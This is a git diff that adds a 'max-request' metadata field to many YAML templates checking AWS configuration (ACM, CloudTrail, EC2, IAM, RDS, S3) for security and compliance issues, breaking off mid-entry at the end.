diff --git a/cloud/aws/acm/acm-cert-renewal-30days.yaml b/cloud/aws/acm/acm-cert-renewal-30days.yaml index 3cae97828a..35bfa57300 100644 --- a/cloud/aws/acm/acm-cert-renewal-30days.yaml +++ b/cloud/aws/acm/acm-cert-renewal-30days.yaml @@ -11,8 +11,9 @@ info: Set up Amazon CloudWatch to monitor ACM certificate expiration and automate renewal notifications or processes. reference: - https://docs.aws.amazon.com/acm/latest/userguide/acm-renewal.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,acm,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/acm/acm-cert-renewal-45days.yaml b/cloud/aws/acm/acm-cert-renewal-45days.yaml index ea8a5647a5..3298230cc4 100644 --- a/cloud/aws/acm/acm-cert-renewal-45days.yaml +++ b/cloud/aws/acm/acm-cert-renewal-45days.yaml @@ -11,8 +11,9 @@ info: Set up Amazon CloudWatch to monitor ACM certificate expiration and automate renewal notifications or processes. reference: - https://docs.aws.amazon.com/acm/latest/userguide/acm-renewal.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,acm,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/acm/acm-cert-validation.yaml b/cloud/aws/acm/acm-cert-validation.yaml index b66e346a02..68ba508649 100644 --- a/cloud/aws/acm/acm-cert-validation.yaml +++ b/cloud/aws/acm/acm-cert-validation.yaml @@ -11,8 +11,9 @@ info: Use AWS ACM for certificate provisioning and ensure domain validation steps are correctly followed for each certificate issued or renewed. reference: - https://docs.aws.amazon.com/acm/latest/userguide/gs-acm-validate.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,acm,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/acm/acm-wildcard-cert.yaml b/cloud/aws/acm/acm-wildcard-cert.yaml index ef6e896265..7ebaa3dc61 100644 --- a/cloud/aws/acm/acm-wildcard-cert.yaml +++ b/cloud/aws/acm/acm-wildcard-cert.yaml @@ -11,8 +11,9 @@ info: Replace wildcard ACM certificates with single domain name certificates for each domain/subdomain within your AWS account. This enhances security by ensuring each domain/subdomain has its own unique private key and certificate. reference: - https://docs.aws.amazon.com/acm/latest/userguide/acm-certificate.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,acm,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/aws-code-env.yaml b/cloud/aws/aws-code-env.yaml index a1d4fa922d..71672fd4dc 100644 --- a/cloud/aws/aws-code-env.yaml +++ b/cloud/aws/aws-code-env.yaml @@ -7,6 +7,8 @@ info: Checks if AWS CLI is set up and all necessary tools are installed on the environment. reference: - https://aws.amazon.com/cli/ + metadata: + max-request: 2 tags: cloud,devops,aws,amazone,aws-cloud-config variables: diff --git a/cloud/aws/cloudtrail/cloudtrail-data-events.yaml b/cloud/aws/cloudtrail/cloudtrail-data-events.yaml index a66f25bb45..f11ba86322 100644 --- a/cloud/aws/cloudtrail/cloudtrail-data-events.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-data-events.yaml @@ -11,8 +11,9 @@ info: Enable data event logging in CloudTrail for S3 buckets to ensure detailed activity monitoring and logging for better security and compliance. reference: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/logging-data-events-with-cloudtrail.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,cloudtrail,aws-cloud-config - variables: region: "ap-south-1" diff --git a/cloud/aws/cloudtrail/cloudtrail-disabled.yaml b/cloud/aws/cloudtrail/cloudtrail-disabled.yaml index 2c279064b7..0a71fc88a0 100644 --- a/cloud/aws/cloudtrail/cloudtrail-disabled.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-disabled.yaml @@ -11,8 +11,9 @@ info: Enable CloudTrail in all AWS regions through the AWS Management Console or CLI to ensure comprehensive activity logging and monitoring. reference: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-getting-started.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config - variables: region: "ap-south-1" diff --git a/cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml b/cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml index f33fbb19fd..82cdf1b73c 100644 --- a/cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-dup-logs.yaml @@ -11,8 +11,9 @@ info: Configure only one multi-region trail to log global service events and disable global service logging for all other trails. reference: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-find-log-files.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config - variables: region: "ap-south-1" diff --git a/cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml b/cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml index 51a2568a98..f611b53de0 100644 --- a/cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml @@ -11,8 +11,9 @@ info: Enable global service logging in CloudTrail by creating or updating a trail to include global services. This ensures comprehensive activity monitoring. reference: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-create-and-update-a-trail.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config - variables: region: "ap-south-1" diff --git a/cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml b/cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml index cdb9e2d23c..8afe78e695 100644 --- a/cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml @@ -11,8 +11,9 @@ info: Enable CloudTrail log file validation and configure CloudWatch Logs to monitor CloudTrail log files. Create CloudWatch Alarms for specific events of interest. reference: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/send-cloudtrail-events-to-cloudwatch-logs.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,cloudtrail,cloudwatch,aws-cloud-config - variables: region: "ap-south-1" diff --git a/cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml b/cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml index 7feef84f70..0de14fa413 100644 --- a/cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml @@ -11,8 +11,9 @@ info: Enable log file integrity validation on all CloudTrail trails to ensure the integrity and authenticity of your logs. reference: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-log-file-validation-intro.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config - variables: region: "ap-south-1" diff --git a/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml b/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml index 84ca11eca2..2db0fdd6c5 100644 --- a/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml @@ -11,8 +11,9 @@ info: Enable Server-Side Encryption (SSE) for CloudTrail logs using an AWS KMS key through the CloudTrail console or AWS CLI. reference: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/encrypting-cloudtrail-log-files-with-aws-kms.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml b/cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml index 4cae24dead..85305d7410 100644 --- a/cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml @@ -11,8 +11,9 @@ info: Enable MFA Delete on CloudTrail buckets via the S3 console or AWS CLI. reference: - https://docs.aws.amazon.com/AmazonS3/latest/userguide/MultiFactorAuthenticationDelete.html + metadata: + max-request: 3 tags: cloud,devops,aws,amazon,s3,aws-cloud-config - variables: region: "ap-south-1" diff --git a/cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml b/cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml index d206f2aed3..87ed17a9c4 100644 --- a/cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml @@ -11,9 +11,9 @@ info: Enable management event logging in CloudTrail by creating a new trail or updating existing trails to include management events. reference: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/logging-management-and-data-events-with-cloudtrail.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config - - variables: region: "ap-south-1" diff --git a/cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml b/cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml index 6a8584340e..d38f83bbb9 100644 --- a/cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml @@ -11,8 +11,9 @@ info: Restrict S3 bucket access using bucket policies or IAM policies to ensure that CloudTrail logs are not publicly accessible. reference: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-find-log-files.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config - variables: region: "ap-south-1" diff --git a/cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml b/cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml index ef93d42d16..c8d1d37749 100644 --- a/cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml +++ b/cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml @@ -11,8 +11,9 @@ info: Enable Server Access Logging on the S3 bucket used by CloudTrail. Configure the logging feature to capture all requests made to the CloudTrail bucket. reference: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-log-file-validation-intro.html + metadata: + max-request: 3 tags: cloud,devops,aws,amazon,s3,cloudtrail,aws-cloud-config - variables: region: "ap-south-1" diff --git a/cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml b/cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml index eea6307c9b..ff7ca0f378 100644 --- a/cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml +++ b/cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml @@ -11,8 +11,9 @@ info: Enable S3 Object Lock in Governance mode with a retention period that meets your compliance requirements for CloudTrail S3 buckets. reference: - https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html + metadata: + max-request: 3 tags: cloud,devops,aws,amazon,s3,aws-cloud-config - variables: region: "ap-south-1" diff --git a/cloud/aws/cloudwatch/cw-alarm-action-set.yaml b/cloud/aws/cloudwatch/cw-alarm-action-set.yaml index 5d5a969bd9..37ba76c60e 100644 --- a/cloud/aws/cloudwatch/cw-alarm-action-set.yaml +++ b/cloud/aws/cloudwatch/cw-alarm-action-set.yaml @@ -11,8 +11,9 @@ info: Configure at least one action for each CloudWatch alarm to ensure timely response to monitored issues. reference: - https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/AlarmThatSendsEmail.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,cloudwatch,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/cloudwatch/cw-alarms-actions.yaml b/cloud/aws/cloudwatch/cw-alarms-actions.yaml index d3d3bf23e9..e46968007b 100644 --- a/cloud/aws/cloudwatch/cw-alarms-actions.yaml +++ b/cloud/aws/cloudwatch/cw-alarms-actions.yaml @@ -11,8 +11,9 @@ info: Enable actions for each CloudWatch alarm by setting the ActionEnabled parameter to true, allowing for automated responses to alarms. reference: - https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/AlarmThatSendsEmail.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,cloudwatch,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/ec2/ec2-imdsv2.yaml b/cloud/aws/ec2/ec2-imdsv2.yaml index d10f792c17..00550b5c9c 100644 --- a/cloud/aws/ec2/ec2-imdsv2.yaml +++ b/cloud/aws/ec2/ec2-imdsv2.yaml @@ -11,9 +11,9 @@ info: Modify the EC2 instance metadata options to set `HttpTokens` to `required`, enforcing the use of IMDSv2. This can be done via the AWS Management Console, CLI, or EC2 API. reference: - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,ec2,aws-cloud-config - - variables: region: "us-east-1" diff --git a/cloud/aws/ec2/ec2-public-ip.yaml b/cloud/aws/ec2/ec2-public-ip.yaml index 97edc1e31d..90676c0e77 100644 --- a/cloud/aws/ec2/ec2-public-ip.yaml +++ b/cloud/aws/ec2/ec2-public-ip.yaml @@ -11,8 +11,9 @@ info: Restrict public IP assignment for EC2 instances, particularly for backend instances. Use private IPs and manage access via AWS VPC and security groups. reference: - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-instance-addressing.html#concepts-public-addresses + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,ec2,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/ec2/ec2-sg-egress-open.yaml b/cloud/aws/ec2/ec2-sg-egress-open.yaml index 77bbec7c2d..caeb3f76be 100644 --- a/cloud/aws/ec2/ec2-sg-egress-open.yaml +++ b/cloud/aws/ec2/ec2-sg-egress-open.yaml @@ -11,8 +11,9 @@ info: Restrict egress traffic in EC2 security groups to only necessary IP addresses and ranges, adhering to the Principle of Least Privilege. reference: - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-security-groups.html#sg-rules + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,ec2,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/ec2/ec2-sg-ingress.yaml b/cloud/aws/ec2/ec2-sg-ingress.yaml index 5734057e9b..e24dbebbb3 100644 --- a/cloud/aws/ec2/ec2-sg-ingress.yaml +++ b/cloud/aws/ec2/ec2-sg-ingress.yaml @@ -11,8 +11,9 @@ info: Restrict access to uncommon ports in EC2 security groups, permitting only necessary traffic and implementing stringent access controls. reference: - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-rules-reference.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,ec2,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/ec2/publicly-shared-ami.yaml b/cloud/aws/ec2/publicly-shared-ami.yaml index f371872c2f..4605660d0b 100644 --- a/cloud/aws/ec2/publicly-shared-ami.yaml +++ b/cloud/aws/ec2/publicly-shared-ami.yaml @@ -11,8 +11,9 @@ info: Restrict AMI sharing to specific, trusted AWS accounts and ensure they are not publicly accessible. reference: - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/sharingamis-explicit.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,ami,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/ec2/unencrypted-aws-ami.yaml b/cloud/aws/ec2/unencrypted-aws-ami.yaml index 07452176fe..1a47dfc0e8 100644 --- a/cloud/aws/ec2/unencrypted-aws-ami.yaml +++ b/cloud/aws/ec2/unencrypted-aws-ami.yaml @@ -11,8 +11,9 @@ info: Encrypt your AMIs using AWS managed keys or customer-managed keys in the AWS Key Management Service (KMS) to ensure data security. reference: - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIEncryption.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,ec2,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/iam/iam-full-admin-privileges.yaml b/cloud/aws/iam/iam-full-admin-privileges.yaml index e48897a0c8..20266828a5 100644 --- a/cloud/aws/iam/iam-full-admin-privileges.yaml +++ b/cloud/aws/iam/iam-full-admin-privileges.yaml @@ -7,6 +7,8 @@ info: Verifies that no Amazon IAM policies grant full administrative privileges, ensuring adherence to the Principle of Least Privilege reference: - https://docs.aws.amazon.com/cli/latest/reference/iam/get-policy-version.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,iam,aws-cloud-config flow: | diff --git a/cloud/aws/iam/iam-key-rotation-90days.yaml b/cloud/aws/iam/iam-key-rotation-90days.yaml index e8525012ee..b9fdb47c3c 100644 --- a/cloud/aws/iam/iam-key-rotation-90days.yaml +++ b/cloud/aws/iam/iam-key-rotation-90days.yaml @@ -7,6 +7,8 @@ info: Checks if IAM user access keys are rotated every 90 days to minimize accidental exposures and unauthorized access risks reference: - https://docs.aws.amazon.com/cli/latest/reference/iam/list-access-keys.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,iam,aws-cloud-config flow: | diff --git a/cloud/aws/iam/iam-mfa-enable.yaml b/cloud/aws/iam/iam-mfa-enable.yaml index 5d649f479c..42e9a22c2b 100644 --- a/cloud/aws/iam/iam-mfa-enable.yaml +++ b/cloud/aws/iam/iam-mfa-enable.yaml @@ -7,6 +7,8 @@ info: Verifies that Multi-Factor Authentication (MFA) is enabled for all IAM users with console access in AWS reference: - https://docs.aws.amazon.com/cli/latest/reference/iam/list-mfa-devices.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,iam,aws-cloud-config flow: | diff --git a/cloud/aws/iam/iam-ssh-keys-rotation.yaml b/cloud/aws/iam/iam-ssh-keys-rotation.yaml index ca9e3a8066..85e10011ea 100644 --- a/cloud/aws/iam/iam-ssh-keys-rotation.yaml +++ b/cloud/aws/iam/iam-ssh-keys-rotation.yaml @@ -7,6 +7,8 @@ info: Verifies that IAM SSH public keys are rotated every 90 days, enhancing security and preventing unauthorized access to AWS CodeCommit repositories reference: - https://docs.aws.amazon.com/cli/latest/reference/iam/list-ssh-public-keys.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,iam,ssh,aws-cloud-config flow: | diff --git a/cloud/aws/rds/aurora-copy-tags-snap.yaml b/cloud/aws/rds/aurora-copy-tags-snap.yaml index bfefd94533..15ef5f8b30 100644 --- a/cloud/aws/rds/aurora-copy-tags-snap.yaml +++ b/cloud/aws/rds/aurora-copy-tags-snap.yaml @@ -11,8 +11,9 @@ info: Enable Copy Tags to Snapshots for Aurora clusters via the AWS Management Console or modify the DB cluster to include this feature using AWS CLI. reference: - https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/USER_Tagging.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,aurora,rds,aws-cloud-config - variables: region: "ap-northeast-1" diff --git a/cloud/aws/rds/aurora-delete-protect.yaml b/cloud/aws/rds/aurora-delete-protect.yaml index c7ae76d4fb..8927aab0c9 100644 --- a/cloud/aws/rds/aurora-delete-protect.yaml +++ b/cloud/aws/rds/aurora-delete-protect.yaml @@ -11,8 +11,9 @@ info: Enable Deletion Protection by modifying the Aurora cluster settings in the AWS Management Console or via the AWS CLI. reference: - https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/DBInstanceDeletionProtection.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,aurora,rds,aws-cloud-config - variables: region: "ap-northeast-1" diff --git a/cloud/aws/rds/iam-db-auth.yaml b/cloud/aws/rds/iam-db-auth.yaml index c76c5618b5..d556f68ca4 100644 --- a/cloud/aws/rds/iam-db-auth.yaml +++ b/cloud/aws/rds/iam-db-auth.yaml @@ -11,8 +11,9 @@ info: Enable IAM Database Authentication for MySQL and PostgreSQL RDS database instances to leverage IAM for secure, token-based access control. reference: - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,rds,aws-cloud-config - variables: region: "ap-northeast-1" diff --git a/cloud/aws/rds/rds-backup-enable.yaml b/cloud/aws/rds/rds-backup-enable.yaml index 4a61f55d05..61da682f54 100644 --- a/cloud/aws/rds/rds-backup-enable.yaml +++ b/cloud/aws/rds/rds-backup-enable.yaml @@ -11,8 +11,9 @@ info: Enable automated backups for RDS instances by setting the backup retention period to a value other than 0. reference: - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_WorkingWithAutomatedBackups.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,rds,aws-cloud-config - variables: region: "ap-northeast-1" diff --git a/cloud/aws/rds/rds-deletion-protection.yaml b/cloud/aws/rds/rds-deletion-protection.yaml index 9e3cf32f15..884e6d6060 100644 --- a/cloud/aws/rds/rds-deletion-protection.yaml +++ b/cloud/aws/rds/rds-deletion-protection.yaml @@ -11,9 +11,9 @@ info: Enable Deletion Protection for all Amazon RDS instances via the AWS Management Console or using the AWS CLI. reference: - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_DeleteInstance.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,rds,aws-cloud-config - - variables: region: "ap-northeast-1" diff --git a/cloud/aws/rds/rds-encryption-check.yaml b/cloud/aws/rds/rds-encryption-check.yaml index 0738c976ec..51ed513f22 100644 --- a/cloud/aws/rds/rds-encryption-check.yaml +++ b/cloud/aws/rds/rds-encryption-check.yaml @@ -11,8 +11,9 @@ info: Enable encryption for your Amazon RDS instances by modifying the instance and setting the "Storage Encrypted" option to true. For new instances, enable encryption within the launch wizard. reference: - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Overview.Encryption.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,rds,aws-cloud-config - variables: region: "ap-northeast-1" diff --git a/cloud/aws/rds/rds-gp-ssd-usage.yaml b/cloud/aws/rds/rds-gp-ssd-usage.yaml index f352ac58ab..cd47b86696 100644 --- a/cloud/aws/rds/rds-gp-ssd-usage.yaml +++ b/cloud/aws/rds/rds-gp-ssd-usage.yaml @@ -11,8 +11,9 @@ info: Convert RDS instances from Provisioned IOPS to General Purpose SSDs to optimize costs without sacrificing I/O performance for most database workloads. reference: - https://aws.amazon.com/rds/features/storage/ + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,rds,aws-cloud-config - variables: region: "ap-northeast-1" diff --git a/cloud/aws/rds/rds-public-snapshot.yaml b/cloud/aws/rds/rds-public-snapshot.yaml index 6e067db633..dc477abaaa 100644 --- a/cloud/aws/rds/rds-public-snapshot.yaml +++ b/cloud/aws/rds/rds-public-snapshot.yaml @@ -11,8 +11,9 @@ info: Modify the snapshot's visibility settings to ensure it is not public, only shared with specific AWS accounts. reference: - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_ShareSnapshot.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,rds,aws-cloud-config - variables: region: "ap-northeast-1" diff --git a/cloud/aws/rds/rds-public-subnet.yaml b/cloud/aws/rds/rds-public-subnet.yaml index 7937f55c6b..ea9594ec42 100644 --- a/cloud/aws/rds/rds-public-subnet.yaml +++ b/cloud/aws/rds/rds-public-subnet.yaml @@ -11,8 +11,9 @@ info: Migrate RDS instances to private subnets within the VPC and ensure proper network ACLs and security group settings are in place to restrict access. reference: - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_VPC.WorkingWithRDSInstanceinaVPC.html#USER_VPC.Subnets + metadata: + max-request: 3 tags: cloud,devops,aws,amazon,rds,aws-cloud-config - variables: region: "ap-northeast-1" diff --git a/cloud/aws/rds/rds-ri-payment-fail.yaml b/cloud/aws/rds/rds-ri-payment-fail.yaml index 40c1bf2e1a..7a40b2f51c 100644 --- a/cloud/aws/rds/rds-ri-payment-fail.yaml +++ b/cloud/aws/rds/rds-ri-payment-fail.yaml @@ -11,8 +11,9 @@ info: Review the payment methods on file and retry the reservation purchase for RDS instances to secure discounted rates. reference: - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_WorkingWithReservedDBInstances.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,rds,aws-cloud-config - variables: region: "ap-northeast-1" diff --git a/cloud/aws/rds/rds-snapshot-encryption.yaml b/cloud/aws/rds/rds-snapshot-encryption.yaml index 49f17f0de3..3ad25f6a8f 100644 --- a/cloud/aws/rds/rds-snapshot-encryption.yaml +++ b/cloud/aws/rds/rds-snapshot-encryption.yaml @@ -11,8 +11,9 @@ info: Enable encryption for RDS snapshots by using AWS KMS Customer Master Keys (CMKs) for enhanced data security and compliance. reference: - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_EncryptSnapshot.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,rds,aws-cloud-config - variables: region: "ap-northeast-1" diff --git a/cloud/aws/s3/s3-access-logging.yaml b/cloud/aws/s3/s3-access-logging.yaml index 4d86b97f8f..0bf1a9c79f 100644 --- a/cloud/aws/s3/s3-access-logging.yaml +++ b/cloud/aws/s3/s3-access-logging.yaml @@ -7,6 +7,8 @@ info: This template verifies if the Server Access Logging feature is enabled for Amazon S3 buckets, which is essential for tracking access requests for security and audit purposes. reference: - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-encryption.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | diff --git a/cloud/aws/s3/s3-auth-fullcontrol.yaml b/cloud/aws/s3/s3-auth-fullcontrol.yaml index c9a52a4e69..b234528c1f 100644 --- a/cloud/aws/s3/s3-auth-fullcontrol.yaml +++ b/cloud/aws/s3/s3-auth-fullcontrol.yaml @@ -7,6 +7,8 @@ info: Checks if Amazon S3 buckets grant FULL_CONTROL access to authenticated users, preventing unauthorized operations reference: - https://docs.aws.amazon.com/AmazonS3/latest/userguide/manage-versioning-examples.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | diff --git a/cloud/aws/s3/s3-bucket-key.yaml b/cloud/aws/s3/s3-bucket-key.yaml index aa49b7d2d1..b6e4a85e93 100644 --- a/cloud/aws/s3/s3-bucket-key.yaml +++ b/cloud/aws/s3/s3-bucket-key.yaml @@ -7,6 +7,8 @@ info: This template verifies if Amazon S3 buckets have bucket keys enabled to optimize the cost of AWS Key Management Service (SSE-KMS) for server-side encryption reference: - https://docs.aws.amazon.com/AmazonS3/latest/userguide/manage-versioning-examples.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | diff --git a/cloud/aws/s3/s3-bucket-policy-public-access.yaml b/cloud/aws/s3/s3-bucket-policy-public-access.yaml index 2d1b41dd32..9edb4e7d62 100644 --- a/cloud/aws/s3/s3-bucket-policy-public-access.yaml +++ b/cloud/aws/s3/s3-bucket-policy-public-access.yaml @@ -7,6 +7,8 @@ info: This template checks if Amazon S3 buckets are configured to prevent public access via bucket policies reference: - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-policy.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | diff --git a/cloud/aws/s3/s3-mfa-delete-check.yaml b/cloud/aws/s3/s3-mfa-delete-check.yaml index 13ccba19cd..257ea66fa6 100644 --- a/cloud/aws/s3/s3-mfa-delete-check.yaml +++ b/cloud/aws/s3/s3-mfa-delete-check.yaml @@ -7,6 +7,8 @@ info: This template verifies that Amazon S3 buckets are configured with Multi-Factor Authentication (MFA) Delete feature, ensuring enhanced protection against unauthorized deletion of versioned objects reference: - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-versioning.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | diff --git a/cloud/aws/s3/s3-public-read-acp.yaml b/cloud/aws/s3/s3-public-read-acp.yaml index a365761525..cc194ad440 100644 --- a/cloud/aws/s3/s3-public-read-acp.yaml +++ b/cloud/aws/s3/s3-public-read-acp.yaml @@ -8,6 +8,8 @@ info: Verifies that Amazon S3 buckets do not permit public 'READ_ACP' (LIST) access to anonymous users, protecting against unauthorized data exposure reference: - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-acl.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | diff --git a/cloud/aws/s3/s3-public-read.yaml b/cloud/aws/s3/s3-public-read.yaml index 56877aa63a..a8fa82cfc6 100644 --- a/cloud/aws/s3/s3-public-read.yaml +++ b/cloud/aws/s3/s3-public-read.yaml @@ -8,6 +8,8 @@ info: Verifies that Amazon S3 buckets do not permit public 'READ' (LIST) access to anonymous users, protecting against unauthorized data exposure reference: - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-acl.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | diff --git a/cloud/aws/s3/s3-public-write-acp.yaml b/cloud/aws/s3/s3-public-write-acp.yaml index aff44da984..d41c09942e 100644 --- a/cloud/aws/s3/s3-public-write-acp.yaml +++ b/cloud/aws/s3/s3-public-write-acp.yaml @@ -7,6 +7,8 @@ info: Checks if Amazon S3 buckets are secured against public WRITE_ACP access, preventing unauthorized modifications to access control permissions. reference: - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-acl.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | diff --git a/cloud/aws/s3/s3-public-write.yaml b/cloud/aws/s3/s3-public-write.yaml index d2192c8cc1..ed2c3a6a19 100644 --- a/cloud/aws/s3/s3-public-write.yaml +++ b/cloud/aws/s3/s3-public-write.yaml @@ -7,6 +7,8 @@ info: Checks if Amazon S3 buckets are secured against public WRITE access, preventing unauthorized modifications to access control permissions. reference: - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-acl.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | diff --git a/cloud/aws/s3/s3-server-side-encryption.yaml b/cloud/aws/s3/s3-server-side-encryption.yaml index 448ee59987..114b86dd79 100644 --- a/cloud/aws/s3/s3-server-side-encryption.yaml +++ b/cloud/aws/s3/s3-server-side-encryption.yaml @@ -7,6 +7,8 @@ info: This template verifies if Amazon S3 buckets have 